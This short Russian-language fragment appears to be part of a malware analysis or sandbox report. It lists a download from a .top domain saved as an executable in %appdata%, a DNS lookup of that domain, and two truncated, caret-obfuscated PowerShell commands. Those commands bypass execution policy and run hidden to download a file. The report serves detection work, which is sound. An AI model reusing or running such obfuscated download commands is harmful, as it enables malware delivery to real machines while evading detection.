Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powE^rS^hEL^l.^exE^ -exECut^IoN^P^Ol^iC^Y^ Bypa^ss -^n^O^pROF^I^l^e^ -WINd^O^WstYlE ^HIdd^e^N^ ^(^NeW-ob^JeC^t SYs^tEM.N^e^t.Web^C^liENt)^.^download^f^iLe('http://truthforeyoue....
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /C "powE^rS^hEL^l.^exE^ -exECut^IoN^P^Ol^iC^Y^ Bypa^ss -^n^O^pROF^I^l^e^ -WINd^O^WstYlE ^HIdd^e^N^ ^(^NeW-ob^JeC^t SYs^tEM.N^e^t.Web^C^liENt)^.^download^f^iLe('http://truthforeyoue....' (со скрытым окном)